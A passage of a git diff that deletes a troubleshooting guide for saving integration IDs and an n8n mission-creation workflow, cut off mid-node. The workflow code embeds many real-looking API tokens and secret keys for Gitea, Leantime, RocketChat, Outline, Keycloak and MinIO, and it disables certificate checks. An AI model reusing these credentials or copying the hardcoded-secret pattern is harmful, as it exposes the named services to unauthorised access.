=== -Using cached messages data for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[IMAP POOL] Size: 0, Active: 0, Connecting: 0, Max: 20 - diff --git a/VERIFY_INTEGRATION_IDS_SAVED.md b/VERIFY_INTEGRATION_IDS_SAVED.md deleted file mode 100644 index 36081b8..0000000 --- a/VERIFY_INTEGRATION_IDS_SAVED.md +++ /dev/null @@ -1,144 +0,0 @@ -# Verify Integration IDs Are Being Saved - -## 🔍 Current Status - -From your deletion logs, I can see: -- ✅ `API key present { present: true }` - N8N_API_KEY is now set! -- ✅ Deletion workflow executes successfully -- ⚠️ `hasRepoName: false` - Mission had no integration IDs - -**This suggests**: The mission was created **before** the fixes were applied, so it didn't have integration IDs. - ---- - -## ✅ Next Steps: Verify IDs Are Being Saved - -### Step 1: Create a New Mission - -1. Create a new mission via the frontend -2. Wait for N8N workflow to complete (30-60 seconds) -3. 
Check the server logs for:
-   ```
-   Mission Created Webhook Received   ← Should appear now!
-   Received mission-created data: { ... }
-   Found mission: { id: "...", name: "..." }
-   Updating giteaRepositoryUrl: ...
-   Updating leantimeProjectId: ...
-   Mission updated successfully
-   ```
-
-### Step 2: Check Database
-
-**Query the database** to verify IDs are saved (note the double quotes: camelCase column names are case-sensitive in PostgreSQL, so unquoted identifiers would fail):
-
-```sql
-SELECT
-  id,
-  name,
-  "giteaRepositoryUrl",
-  "leantimeProjectId",
-  "outlineCollectionId",
-  "rocketChatChannelId",
-  "createdAt"
-FROM "Mission"
-WHERE "createdAt" > NOW() - INTERVAL '1 hour'
-ORDER BY "createdAt" DESC;
-```
-
-**Expected**: Recent missions should have integration IDs populated (not null).
-
-### Step 3: Check Server Logs During Creation
-
-**Look for these logs** when creating a mission:
-
-```
-Starting N8N workflow
-POST /mission-created 200          ← N8N receiving webhook
-Mission Created Webhook Received   ← Our endpoint being called! ✅
-Received mission-created data: { ... }
-Updating giteaRepositoryUrl: ...
-Updating leantimeProjectId: ...
-Mission updated successfully
-```
-
-**If you see "Mission Created Webhook Received"**: ✅ IDs are being saved!
-
-**If you DON'T see it**: ❌ N8N is still not calling the endpoint correctly.
-
----
-
-## 🧪 Test Checklist
-
-After creating a new mission:
-
-- [ ] Server logs show "Mission Created Webhook Received"
-- [ ] Server logs show "Updating giteaRepositoryUrl" (if Gitea was created)
-- [ ] Server logs show "Updating leantimeProjectId" (if Leantime was created)
-- [ ] Server logs show "Updating outlineCollectionId" (if Outline was created)
-- [ ] Server logs show "Updating rocketChatChannelId" (if RocketChat was created)
-- [ ] Server logs show "Mission updated successfully"
-- [ ] Database query shows non-null integration IDs
-- [ ] Mission deletion receives non-empty IDs
-
----
-
-## 📊 Expected vs Actual
-
-### Expected (After Fix)
-
-**Mission Creation Logs**:
-```
-Starting N8N workflow
-POST /mission-created 200
-Mission Created Webhook Received ✅
-Received mission-created data: { missionId: "...", ... }
-Updating giteaRepositoryUrl: https://gite.slm-lab.net/alma/repo-name
-Updating leantimeProjectId: 123
-Mission updated successfully
-```
-
-**Database**:
-```
-giteaRepositoryUrl: "https://gite.slm-lab.net/alma/repo-name"
-leantimeProjectId: "123"
-outlineCollectionId: "collection-456"
-rocketChatChannelId: "channel-789"
-```
-
-**Mission Deletion**:
-```
-hasRepoName: true ✅
-leantimeProjectId: 123 ✅
-documentationCollectionId: "collection-456" ✅
-rocketchatChannelId: "channel-789" ✅
-```
-
-### Actual (From Your Logs)
-
-**Mission Deletion**:
-```
-hasRepoName: false ❌ (Mission created before fix)
-```
-
----
-
-## 🎯 Action Required
-
-**Create a NEW mission** and check:
-
-1. **Server logs** during creation - should show "Mission Created Webhook Received"
-2. **Database** after creation - should have integration IDs
-3. **Deletion logs** - should show non-empty IDs
-
-If the new mission has IDs saved, then the fix is working! 
✅ - -If not, we need to check: -- N8N workflow configuration -- N8N execution logs -- Server logs for errors - ---- - -**Document Created**: $(date) -**Status**: Waiting for verification that new missions have IDs saved - diff --git a/base.json b/base.json deleted file mode 100644 index 9146f1f..0000000 --- a/base.json +++ /dev/null @@ -1,1019 +0,0 @@ -{ - "name": "base", - "nodes": [ - { - "parameters": { - "jsCode": "const missionData = $input.item.json;\nconst binaryData = $input.item.binary;\n\n// Add detailed logging\nconsole.log('Process Mission Data - Input:', {\n hasInput: !!missionData,\n hasBinary: !!binaryData,\n hasBody: !!missionData?.body,\n hasLogo: !!missionData?.logo,\n hasAttachments: Array.isArray(missionData?.attachments),\n attachmentsCount: missionData?.attachments?.length || 0,\n logoDataType: typeof missionData?.logo,\n logoData: missionData?.logo ? 'present' : 'missing',\n contentType: missionData?.missionOriginal?.headers?.['content-type'] || 'unknown',\n binaryKeys: binaryData ? Object.keys(binaryData) : [],\n binaryDataTypes: binaryData ? Object.keys(binaryData).map(key => typeof binaryData[key]?.data) : [],\n creatorId: missionData?.creatorId || 'missing'\n});\n\n// Add detailed logging for services\nconsole.log('Process Mission Data - Services:', {\n originalServices: missionData?.missionOriginal?.body?.services,\n bodyServices: missionData?.body?.services,\n directServices: missionData?.services,\n finalServices: missionData?.missionOriginal?.body?.services || missionData?.body?.services || missionData?.services || []\n});\n\n// Handle raw file input\nif (missionData?.missionOriginal?.headers?.['content-type']?.startsWith('image/')) {\n console.log('Detected raw image file input');\n \n // Get binary data from the first available key\n const binaryKey = Object.keys(binaryData || {})[0];\n const rawData = binaryKey ? binaryData[binaryKey]?.data : null;\n \n if (!rawData) {\n console.error('No binary data found in raw file input');\n throw new Error('No binary data found in raw file input');\n }\n \n // Ensure rawData is a Buffer\n const buffer = Buffer.isBuffer(rawData) ? 
rawData : Buffer.from(rawData);\n \n // Convert raw data to base64\n const base64Data = buffer.toString('base64');\n const mimeType = missionData.missionOriginal.headers['content-type'];\n \n // Create mission data structure\n return {\n missionOriginal: missionData,\n missionProcessed: {\n name: \"Unnamed Mission\",\n sanitizedName: \"unnamed-mission\",\n intention: \"\",\n description: \"Mission documentation\",\n startDate: new Date().toISOString().split('T')[0],\n endDate: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000).toISOString().split('T')[0],\n missionType: \"default\",\n guardians: {},\n volunteers: [],\n profils: [],\n services: [],\n clientId: 2,\n rocketChatUsernames: [],\n logo: {\n data: `data:${mimeType};base64,${base64Data}`,\n name: \"logo.png\",\n type: mimeType\n },\n attachments: []\n },\n config: {\n GITEA_API_URL: \"https://gite.slm-lab.net/api/v1\",\n GITEA_API_TOKEN: \"310645d564cbf752be1fe3b42582a3d5f5d0bddd\",\n GITEA_OWNER: \"alma\",\n LEANTIME_API_URL: \"https://agilite.slm-lab.net\",\n LEANTIME_API_TOKEN: \"lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb\",\n ROCKETCHAT_API_URL: \"https://parole.slm-lab.net/\",\n ROCKETCHAT_AUTH_TOKEN: \"w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB\",\n ROCKETCHAT_USER_ID: \"Tpuww59PJKsrGNQJB\",\n OUTLINE_API_URL: \"https://chapitre.slm-lab.net/api\",\n OUTLINE_API_TOKEN: \"ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN\",\n MISSION_API_URL: \"https://hub.slm-lab.net\",\n N8N_API_KEY: \"LwgeE1ntADD20OuWC88S3pR0EaO7FtO4\",\n KEYCLOAK_BASE_URL: \"https://connect.slm-lab.net\",\n KEYCLOAK_REALM: \"cercle\",\n KEYCLOAK_CLIENT_ID: \"lab\",\n KEYCLOAK_CLIENT_SECRET: \"LwgeE1ntADD20OuWC88S3P0EaO7FtO4\",\n MINIO_API_URL: \"https://dome-api.slm-lab.net\",\n MINIO_ACCESS_KEY: \"4aBT4CMb7JIMMyUtp4Pl\",\n MINIO_SECRET_KEY: \"HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg\"\n },\n binary: {\n data: buffer\n },\n creatorId: missionData?.creatorId || missionData?.missionOriginal?.body?.creatorId || missionData?.body?.creatorId\n };\n}\n\n// Continue with existing JSON processing\nconst sanitizeName = (name) => {\n if (!name || typeof name !== \"string\") return \"unnamed-mission\";\n return name.toLowerCase()\n .split(\"\")\n .map(c => {\n if (c >= \"a\" && c <= \"z\") return c;\n if (c >= \"0\" && c <= \"9\") return c;\n if (c === \" \" || c === \"-\") return c;\n return \"\";\n })\n .join(\"\")\n .split(\" \")\n .filter(Boolean)\n .join(\"-\");\n};\nconst formatDate = (date) => {\n if (!date) return \"\";\n const d = new Date(date);\n return d.toISOString().split(\"T\")[0];\n};\nconst missionName = missionData?.missionOriginal?.body?.name || missionData?.body?.name || missionData?.name || \"Unnamed Mission\";\n\n// Prepare file data for MinIO\nconst prepareFileData = (file) => {\n if (!file) {\n // Return default logo if no file provided\n return {\n data: \"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\",\n name: \"default-logo.png\",\n type: \"image/png\"\n };\n }\n \n // Handle different file formats\n if (typeof file === \"string\") {\n return {\n data: file,\n name: \"logo.png\",\n type: \"image/png\"\n };\n }\n \n if (typeof file === \"object\") {\n // Handle binary data\n if (file.data && typeof file.data === \"object\" && file.data.data) {\n return {\n data: file.data.data,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n // Handle base64 data\n if (file.data && typeof file.data === \"string\") {\n return {\n data: 
file.data,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n // Handle direct object\n return {\n data: file,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n return null;\n};\n\nconst output = {\n missionOriginal: missionData,\n missionProcessed: {\n name: missionName,\n sanitizedName: sanitizeName(missionName),\n intention: missionData?.missionOriginal?.body?.intention || missionData?.body?.intention || missionData?.intention || \"\",\n description: missionData?.missionOriginal?.body?.intention || missionData?.body?.intention || missionData?.intention || \"Mission documentation\",\n startDate: formatDate(new Date()),\n endDate: formatDate(new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)),\n missionType: missionData?.missionOriginal?.body?.missionType || missionData?.body?.missionType || missionData?.missionType || \"default\",\n guardians: missionData?.missionOriginal?.body?.guardians || missionData?.body?.guardians || missionData?.guardians || {},\n volunteers: missionData?.missionOriginal?.body?.volunteers || missionData?.body?.volunteers || missionData?.volunteers || [],\n profils: missionData?.missionOriginal?.body?.profils || missionData?.body?.profils || missionData?.profils || [],\n services: missionData?.missionOriginal?.body?.services || missionData?.body?.services || missionData?.services || [],\n clientId: (missionData?.missionOriginal?.body?.missionType === \"interne\" || missionData?.body?.missionType === \"interne\" || missionData?.missionType === \"interne\") ? 1 : 2,\n rocketChatUsernames: [],\n logo: prepareFileData(missionData?.logo),\n attachments: Array.isArray(missionData?.attachments) ? missionData.attachments.map(prepareFileData).filter(Boolean) : []\n },\n config: {\n GITEA_API_URL: \"https://gite.slm-lab.net/api/v1\",\n GITEA_API_TOKEN: \"310645d564cbf752be1fe3b42582a3d5f5d0bddd\",\n GITEA_OWNER: \"alma\",\n LEANTIME_API_URL: \"https://agilite.slm-lab.net\",\n LEANTIME_API_TOKEN: \"lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb\",\n ROCKETCHAT_API_URL: \"https://parole.slm-lab.net/\",\n ROCKETCHAT_AUTH_TOKEN: \"w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB\",\n ROCKETCHAT_USER_ID: \"Tpuww59PJKsrGNQJB\",\n OUTLINE_API_URL: \"https://chapitre.slm-lab.net/api\",\n OUTLINE_API_TOKEN: \"ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN\",\n MISSION_API_URL: \"https://hub.slm-lab.net\",\n N8N_API_KEY: \"LwgeE1ntADD20OuWC88S3pR0EaO7FtO4\",\n KEYCLOAK_BASE_URL: \"https://connect.slm-lab.net\",\n KEYCLOAK_REALM: \"cercle\",\n KEYCLOAK_CLIENT_ID: \"lab\",\n KEYCLOAK_CLIENT_SECRET: \"LwgeE1ntADD20OuWC88S3P0EaO7FtO4\",\n MINIO_API_URL: \"https://dome-api.slm-lab.net\",\n MINIO_ACCESS_KEY: \"4aBT4CMb7JIMMyUtp4Pl\",\n MINIO_SECRET_KEY: \"HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg\"\n },\n creatorId: missionData?.creatorId || missionData?.missionOriginal?.body?.creatorId || missionData?.body?.creatorId || missionData?.missionOriginal?.creatorId || missionData?.missionProcessed?.creatorId\n};\n\n// Add binary data to output if available\nif (binaryData) {\n const binaryKey = Object.keys(binaryData)[0];\n if (binaryKey && binaryData[binaryKey]?.data) {\n // Ensure the data is a Buffer\n const data = binaryData[binaryKey].data;\n output.binary = {\n data: Buffer.isBuffer(data) ? 
data : Buffer.from(data)\n };\n }\n}\n\nconst guardians = missionData?.missionOriginal?.body?.guardians || missionData?.body?.guardians || missionData?.guardians || {};\nif (guardians) {\n for (const role in guardians) {\n const user = guardians[role];\n if (user) output.missionProcessed.rocketChatUsernames.push(user);\n }\n}\nconst volunteers = missionData?.missionOriginal?.body?.volunteers || missionData?.body?.volunteers || missionData?.volunteers || [];\nif (Array.isArray(volunteers)) {\n output.missionProcessed.rocketChatUsernames.push(...volunteers);\n}\noutput.missionProcessed.rocketChatUsernames = [...new Set(output.missionProcessed.rocketChatUsernames)];\n\n// Ensure binary data is always available\nif (!output.binary || !output.binary.data) {\n console.log('No binary data found, using default PNG');\n output.binary = {\n data: Buffer.from(\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\", 'base64')\n };\n}\n\n// Log the final output\nconsole.log('Process Mission Data - Final Output:', {\n services: output.missionProcessed.services,\n isArray: Array.isArray(output.missionProcessed.services),\n containsGite: Array.isArray(output.missionProcessed.services) && output.missionProcessed.services.includes('Gite')\n});\n\nreturn output;" - }, - "name": "Process Mission Data", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -1040, - 600 - ], - "id": "3f2bd512-63d6-4bbe-8e41-c4ef92647562" - }, - { - "parameters": { - "functionCode": "const input = $input.item.json;\nconst binaryData = $input.item.binary;\n\n// Detailed input tracing\nconsole.log(\"Decode Logo Data - Detailed Input Trace:\", {\n // Input structure\n hasInput: !!input,\n inputType: typeof input,\n inputKeys: input ? Object.keys(input) : [],\n \n // Binary data\n hasBinary: !!binaryData,\n binaryType: typeof binaryData,\n binaryKeys: binaryData ? Object.keys(binaryData) : [],\n \n // Mission data\n hasMissionProcessed: !!input?.missionProcessed,\n missionProcessedKeys: input?.missionProcessed ? Object.keys(input.missionProcessed) : [],\n \n // Logo data\n hasLogo: !!input?.missionProcessed?.logo,\n logoType: typeof input?.missionProcessed?.logo,\n logoKeys: input?.missionProcessed?.logo ? Object.keys(input.missionProcessed.logo) : [],\n \n // Headers\n hasHeaders: !!input?.missionOriginal?.headers,\n contentType: input?.missionOriginal?.headers?.['content-type'],\n contentDisposition: input?.missionOriginal?.headers?.['content-disposition']\n});\n\n// Default transparent PNG base64 (1x1 pixel)\nconst DEFAULT_PNG = \"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\";\n\n// Helper function to create a valid buffer with detailed logging\nconst createValidBuffer = (data, source) => {\n console.log(`Creating buffer from ${source}:`, {\n dataType: typeof data,\n isBuffer: Buffer.isBuffer(data),\n isString: typeof data === 'string',\n isObject: typeof data === 'object',\n hasData: data?.data ? 
'yes' : 'no'\n });\n \n try {\n if (!data) {\n console.log(`${source}: No data provided`);\n return null;\n }\n \n // If it's already a buffer, return it\n if (Buffer.isBuffer(data)) {\n console.log(`${source}: Data is already a buffer`);\n return data;\n }\n \n // If it's a string, try to create a buffer\n if (typeof data === 'string') {\n // Check if it's base64\n if (data.includes(',')) {\n console.log(`${source}: Converting base64 string to buffer`);\n const base64Data = data.split(',')[1];\n return Buffer.from(base64Data, 'base64');\n }\n // Try as raw string\n console.log(`${source}: Converting raw string to buffer`);\n return Buffer.from(data);\n }\n \n // If it's an object with data property\n if (data && typeof data === 'object' && data.data) {\n console.log(`${source}: Converting object with data property`);\n return createValidBuffer(data.data, `${source}.data`);\n }\n \n console.log(`${source}: Could not create buffer from data`);\n return null;\n } catch (e) {\n console.error(`Error creating buffer from ${source}:`, e);\n return null;\n }\n};\n\n// Try to get binary data with detailed logging\nconst getBinaryData = () => {\n // First try: Check raw binary data\n if (binaryData) {\n console.log('Checking raw binary data...');\n const binaryKey = Object.keys(binaryData)[0];\n if (binaryKey && binaryData[binaryKey]?.data) {\n const buffer = createValidBuffer(binaryData[binaryKey].data, 'raw binary');\n if (buffer) {\n console.log('Successfully created buffer from raw binary data');\n return {\n buffer,\n fileName: input.missionOriginal?.headers?.['content-disposition']?.split('filename=')[1] || 'logo.png',\n mimeType: input.missionOriginal?.headers?.['content-type'] || 'image/png'\n };\n }\n }\n }\n \n // Second try: Check mission processed logo\n console.log('Checking mission processed logo...');\n const logo = input?.missionProcessed?.logo || input?.body?.logo || input?.logo;\n if (logo?.data) {\n const buffer = createValidBuffer(logo.data, 'mission logo');\n if (buffer) {\n console.log('Successfully created buffer from mission logo');\n return {\n buffer,\n fileName: logo.name || 'logo.png',\n mimeType: logo.type || 'image/png'\n };\n }\n }\n \n // Third try: Check if input is raw binary\n console.log('Checking if input is raw binary...');\n if (input && typeof input === 'object' && !input.missionProcessed) {\n const buffer = createValidBuffer(input, 'raw input');\n if (buffer) {\n console.log('Successfully created buffer from raw input');\n return {\n buffer,\n fileName: 'logo.png',\n mimeType: 'image/png'\n };\n }\n }\n \n // Fallback to default\n console.log('No valid binary data found, using default PNG');\n return {\n buffer: Buffer.from(DEFAULT_PNG, 'base64'),\n fileName: 'default-logo.png',\n mimeType: 'image/png'\n };\n};\n\n// Get the binary data with all fallbacks\nconst { buffer, fileName, mimeType } = getBinaryData();\n\n// Validate buffer before creating output\nif (!buffer || !Buffer.isBuffer(buffer)) {\n console.error('Invalid buffer created, forcing default');\n const defaultBuffer = Buffer.from(DEFAULT_PNG, 'base64');\n \n return {\n json: {\n ...input,\n fileName: 'default-logo.png',\n mimeType: 'image/png',\n sanitizedName: input?.missionProcessed?.sanitizedName || \"unnamed-mission\",\n logoProcessed: true,\n forcedDefault: true\n },\n binary: {\n data: defaultBuffer\n }\n };\n}\n\n// Create output with both json and binary data in the correct structure\nconst output = {\n json: {\n ...input,\n fileName,\n mimeType,\n sanitizedName: 
input?.missionProcessed?.sanitizedName || \"unnamed-mission\",\n logoProcessed: true,\n bufferSize: buffer.length\n },\n binary: {\n data: buffer\n }\n};\n\n// Log the output for debugging\nconsole.log(\"Decode Logo Data - Final Output:\", {\n fileName: output.json.fileName,\n mimeType: output.json.mimeType,\n bufferSize: output.json.bufferSize,\n hasBinaryData: !!output.binary?.data,\n binaryDataType: typeof output.binary?.data,\n isBuffer: Buffer.isBuffer(output.binary?.data)\n});\n\n// Ensure binary data is always available\nif (!output.binary || !output.binary.data) {\n console.error('Binary data missing in output, forcing default');\n output.binary = {\n data: Buffer.from(DEFAULT_PNG, 'base64')\n };\n}\n\nreturn output;" - }, - "name": "Decode Logo Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -840, - 480 - ], - "id": "d53a9001-27a7-4dec-b083-962771610fad" - }, - { - "parameters": { - "functionCode": "// Process attachments for S3 upload with improved error handling\nconst input = $input.item.json;\nconst attachments = input?.missionProcessed?.attachments || [];\n\n// Create a default output with a flag indicating if there are attachments\nconst defaultOutput = {\n json: {\n ...input,\n hasAttachments: false,\n attachmentUrls: [], // Initialize empty array for consistency\n skipIntegrations: false // Add flag to control integration flow\n }\n};\n\n// If no attachments or invalid input, return default output and skip S3 node\nif (!input || !Array.isArray(attachments) || attachments.length === 0) {\n console.log('No attachments found or invalid input structure');\n return defaultOutput;\n}\n\n// Process the first attachment to check if it's valid\nlet hasValidAttachments = false;\nlet validAttachments = [];\n\n// Check all attachments for validity\ntry {\n for (const attachment of attachments) {\n if (attachment && attachment.data) {\n // Extract pure base64 (remove data:image/... 
prefix if present)\n let base64Data = attachment.data;\n if (typeof base64Data === 'string' && base64Data.includes(',')) {\n base64Data = base64Data.split(',')[1];\n }\n \n // If we have valid data, mark as valid and include in valid attachments\n if (base64Data && base64Data.trim() !== '') {\n try {\n // Test if it's valid base64 by creating a buffer\n const testBuffer = Buffer.from(base64Data, 'base64');\n if (testBuffer.length > 0) {\n hasValidAttachments = true;\n validAttachments.push({\n data: base64Data,\n name: attachment.name || `attachment-${validAttachments.length}.png`,\n type: attachment.type || 'application/octet-stream'\n });\n }\n } catch (e) {\n console.log(`Skipping invalid attachment: ${e.message}`);\n // Skip this attachment but continue processing others\n }\n }\n }\n }\n} catch (error) {\n // If any error in the loop, log it but don't fail the workflow\n console.error('Error checking attachment validity:', error);\n}\n\n// If no valid attachments after checking, return the default output\nif (!hasValidAttachments || validAttachments.length === 0) {\n console.log('No valid attachments found after validation');\n return defaultOutput;\n}\n\n// At this point, we know we have at least one valid attachment\n// Prepare the output with attachment info\nreturn {\n json: {\n ...input,\n hasAttachments: true,\n attachmentCount: validAttachments.length,\n attachmentData: validAttachments,\n originalAttachmentsCount: attachments.length,\n skipIntegrations: false // Ensure integrations run\n }\n};" - }, - "name": "Check Attachments", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -840, - 740 - ], - "id": "338e7b89-639a-4df6-bbbd-f8ddfebaec70" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.hasAttachments }}", - "value2": true - } - ] - } - }, - "name": "IF Has Attachments", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - -620, - 740 - ], - "id": "d451be7e-c2a7-4bf8-aea0-5793933799a3" - }, - { - "parameters": { - "functionCode": "// Process single attachment for S3 upload with improved error handling\nconst input = $input.item.json;\n\n// Log for debugging\nconsole.log('Process Attachment Data input:', {\n hasInput: !!input,\n hasAttachmentData: !!input?.attachmentData,\n attachmentDataLength: input?.attachmentData?.length || 0,\n attachmentData: input?.attachmentData ? 'present' : 'missing'\n});\n\n// Create array to hold processed attachments\nconst outputs = [];\n\n// Early return if no attachment data to prevent race conditions\nif (!Array.isArray(input?.attachmentData) || input.attachmentData.length === 0) {\n console.log('No valid attachment data found, returning placeholder');\n return [{ \n json: { \n ...input,\n processingFailed: true,\n reason: 'No valid attachments to process'\n } \n }];\n}\n\n// Process each attachment\ninput.attachmentData.forEach((attachment, index) => {\n try {\n if (!attachment || !attachment.data) {\n console.log(`Skipping attachment ${index}: No data`);\n return;\n }\n \n // Extract pure base64 (remove data:image/... 
prefix if present)\n let base64Data = attachment.data;\n if (typeof base64Data === 'string' && base64Data.includes(',')) {\n base64Data = base64Data.split(',')[1];\n }\n \n // Skip if no valid base64 data\n if (!base64Data || base64Data.trim() === '') {\n console.log(`Skipping attachment ${index}: Empty data`);\n return;\n }\n \n try {\n // Verify the base64 data is valid\n const buffer = Buffer.from(base64Data, 'base64');\n \n if (buffer.length === 0) {\n console.log(`Skipping attachment ${index}: Empty buffer`);\n return;\n }\n \n // Create output for this attachment\n outputs.push({\n json: {\n ...input,\n fileName: attachment.name || `attachment-${index}.${attachment.type?.split('/')[1] || 'bin'}`,\n mimeType: attachment.type || 'application/octet-stream',\n index: index,\n totalAttachments: input.attachmentData.length,\n missionId: input.missionProcessed?.sanitizedName || 'unnamed-mission',\n attachmentProcessed: true\n },\n binary: {\n data: buffer\n }\n });\n \n console.log(`Successfully processed attachment ${index}: ${attachment.name}`);\n } catch (e) {\n console.error(`Failed to create buffer for attachment ${index}:`, e);\n }\n } catch (error) {\n // Skip failed attachments but log the error\n console.error(`Failed to process attachment ${index}:`, error);\n }\n});\n\n// Return processed attachments or a placeholder if none processed\nif (outputs.length > 0) {\n console.log(`Successfully processed ${outputs.length} attachments`);\n return outputs;\n} else {\n console.log('No attachments were successfully processed');\n return [{ \n json: { \n ...input,\n processingFailed: true,\n reason: 'All attachments failed processing'\n } \n }];\n}" - }, - "name": "Process Attachment Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -440, - 680 - ], - "id": "34cd0412-01da-446d-aafd-8762358766c4" - }, - { - "parameters": { - "operation": "upload", - "bucketName": "=missions", - "fileName": "={{$input.item.json.sanitizedName}}/logo.png", - "additionalFields": { - "acl": "public-read" - } - }, - "id": "d469dea0-f1bd-4896-a385-88194bc28b94", - "name": "S3 Upload Logo", - "type": "n8n-nodes-base.s3", - "typeVersion": 1, - "position": [ - -500, - 480 - ], - "credentials": { - "s3": { - "id": "xvSkHfsTBJxzopIj", - "name": "S3 account 2" - } - }, - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Debug node to ensure binary data is properly structured\nconst input = $input.item;\n\n// Log the full input structure\nconsole.log('Debug - Input structure:', {\n hasJson: !!input.json,\n hasBinary: !!input.binary,\n hasBinaryData: !!input.binary?.data,\n binaryDataType: typeof input.binary?.data,\n isBuffer: Buffer.isBuffer(input.binary?.data),\n jsonKeys: input.json ? Object.keys(input.json) : [],\n binaryKeys: input.binary ? 
Object.keys(input.binary) : []\n});\n\n// Ensure binary data is properly structured\nif (!input.binary?.data) {\n console.error('No binary data found in input');\n throw new Error('No binary data found in input');\n}\n\n// Return the input unchanged\nreturn input;" - }, - "name": "Debug Binary Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -720, - 480 - ], - "id": "3162b0d4-8947-4d1b-bd38-4cc0ba89dd08" - }, - { - "parameters": { - "functionCode": "// Generate empty attachment result when there are no attachments\nconst input = $input.item.json;\n\n// Return input with empty attachment urls and skip integrations flag\nreturn {\n json: {\n ...input,\n attachmentUrls: [],\n noAttachments: true,\n skipIntegrations: true // Skip integrations for this path\n }\n};" - }, - "name": "Empty Attachment Result", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -320, - 880 - ], - "id": "781e38e6-f13d-4b47-a6a7-e081a5ad6a75" - }, - { - "parameters": { - "functionCode": "// Process upload results and prepare for integrations\nconst input = $input.item.json;\n\n// Log the input for debugging\nconsole.log('Process Upload Results - Input:', {\n hasInput: !!input,\n hasAttachments: input?.hasAttachments,\n logoUrl: input?.logoUrl,\n attachmentUrls: input?.attachmentUrls,\n skipIntegrations: input?.skipIntegrations\n});\n\n// Determine if we should run integrations\nconst shouldRunIntegrations = !input?.skipIntegrations;\n\n// Create the output with all necessary data\nconst output = {\n ...input,\n logoUrl: input?.logoUrl || '',\n attachmentUrls: Array.isArray(input?.attachmentUrls) ? input.attachmentUrls : [],\n hasAttachments: !!input?.hasAttachments,\n skipIntegrations: !shouldRunIntegrations\n};\n\n// Log the output for debugging\nconsole.log('Process Upload Results - Output:', {\n hasLogoUrl: !!output.logoUrl,\n attachmentUrlsCount: output.attachmentUrls.length,\n hasAttachments: output.hasAttachments,\n skipIntegrations: output.skipIntegrations\n});\n\nreturn { json: output };" - }, - "name": "Process Upload Results", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -60, - 780 - ], - "id": "5f18399b-670d-4bf6-bd5c-0cde13908c1d" - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.KEYCLOAK_BASE_URL + '/realms/' + $node['Process Mission Data'].json.config.KEYCLOAK_REALM + '/protocol/openid-connect/token' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/x-www-form-urlencoded" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "grant_type", - "value": "client_credentials" - }, - { - "name": "client_id", - "value": "={{ $node['Process Mission Data'].json.config.KEYCLOAK_CLIENT_ID }}" - }, - { - "name": "client_secret", - "value": "LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Get Keycloak Token", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - -80, - 520 - ], - "id": "8dd4857b-f536-4acb-ab4e-b15e7f16d2ad", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "const input = $input.item.json;\n\n// Log full input for debugging\nconsole.log('Keycloak response received:', JSON.stringify(input));\n\n// Handle potential errors from Keycloak\nif (input.error || 
(input.statusCode >= 400 && input.statusCode <= 599)) {\n console.error('Keycloak error detected. Status:', input.statusCode);\n console.error('Error details:', JSON.stringify(input.error || input.body || input));\n \n // If there's a specific error message in the response body, extract it\n let errorMessage = 'Unknown error from Keycloak';\n let errorDetails = '';\n \n try {\n if (input.error?.message) {\n // Try to parse the error message if it's JSON\n if (input.error.message.includes('{\"error\"')) {\n const errorJson = JSON.parse(input.error.message.substring(input.error.message.indexOf('{')));\n errorMessage = errorJson.error || errorMessage;\n errorDetails = errorJson.error_description || '';\n } else {\n errorMessage = input.error.message;\n }\n } else if (typeof input.body === 'object' && input.body.error) {\n errorMessage = input.body.error;\n errorDetails = input.body.error_description || '';\n }\n } catch (e) {\n console.error('Error parsing Keycloak error:', e);\n }\n \n // Return a default object to allow workflow to continue\n return { json: { \n ...input, // Preserve all original data\n access_token: 'ERROR_FETCHING_TOKEN',\n error: errorMessage,\n errorDetails: errorDetails,\n original_error: input.error || input.body || input\n }};\n}\n\n// Extract token from successful response\nconst access_token = input.body?.access_token;\nif (!access_token) {\n console.error('No access token received from Keycloak');\n 